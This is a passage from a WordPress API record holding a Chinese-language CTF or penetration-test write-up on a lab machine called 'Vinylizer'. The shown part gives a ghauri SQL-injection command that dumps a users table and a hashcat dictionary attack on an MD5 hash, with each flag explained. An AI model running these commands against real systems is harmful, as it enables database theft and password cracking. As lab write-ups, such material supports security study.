--tables\nghauri -r sql.txt -p username - dbms mysql -D vinyl_marketplace -T users - dump<\/code><\/pre>\n<p>\u5b9e\u6d4b\u901f\u5ea6\u975e\u5e38\u5feb\uff01<\/p>\n<h3>\u4f7f\u7528hashcat\u7206\u7834<\/h3>\n<pre><code class=\"language-bash\">hashcat -a 0 -m 0 &quot;9432522ed1a8fca612b11c3980a031f6&quot; \/usr\/share\/wordlists\/rockyou.txt --show<\/code><\/pre>\n<ul>\n<li><code>-a 0<\/code> \u8868\u793a\u4f7f\u7528\u5b57\u5178\u653b\u51fb\u6a21\u5f0f\uff0c\u4e5f\u5c31\u662f\u5c1d\u8bd5\u5c06\u54c8\u5e0c\u503c\u4e0e\u4e00\u4e2a\u5b57\u5178\u4e2d\u7684\u6bcf\u4e2a\u5355\u8bcd\u8fdb\u884c\u6bd4\u5bf9\u3002<\/li>\n<li><code>-m 0<\/code> \u8868\u793a\u8981\u7834\u89e3\u7684\u54c8\u5e0c\u7b97\u6cd5\u7c7b\u578b\u3002\u5728\u8fd9\u91cc\uff0c<code>0<\/code> \u4ee3\u8868 MD5 \u54c8\u5e0c\u7b97\u6cd5\u3002<\/li>\n<li><code>&quot;9432522ed1a8fca612b11c3980a031f6&quot;<\/code> \u662f\u8981\u7834\u89e3\u7684\u54c8\u5e0c\u503c\u3002<\/li>\n<li><code>\/usr\/share\/wordlists\/rockyou.txt<\/code> \u662f\u5305\u542b\u5bc6\u7801\u5217\u8868\u7684\u8def\u5f84\u3002\u5728\u8fd9\u4e2a\u547d\u4ee4\u4e2d\uff0cHashcat \u5c06\u4f1a\u5c1d\u8bd5\u4f7f\u7528 RockYou \u5b57\u5178\u4e2d\u7684\u5bc6\u7801\u6765\u4e0e\u54c8\u5e0c\u503c\u8fdb\u884c\u6bd4\u5bf9\u3002<\/li>\n<li><code>--show<\/code> \u53c2\u6570\u8868\u793a\u5982\u679c\u627e\u5230\u4e86\u5339\u914d\u7684\u5bc6\u7801\uff0c\u5c06\u4f1a\u663e\u793a\u5bc6\u7801\u672c\u8eab\u800c\u4e0d\u662f\u54c8\u5e0c\u503c\u3002<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Vinylizer \u5f00\u59cb\u8fdb\u884c\u653b\u51fb\u3002 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf nmap -sCV -p- 10.0.2.12 POR [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-469","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/469","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=469"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/469\/revisions"}],"predecessor-version":[{"id":470,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/469\/revisions\/470"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=469"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=469"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=469"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}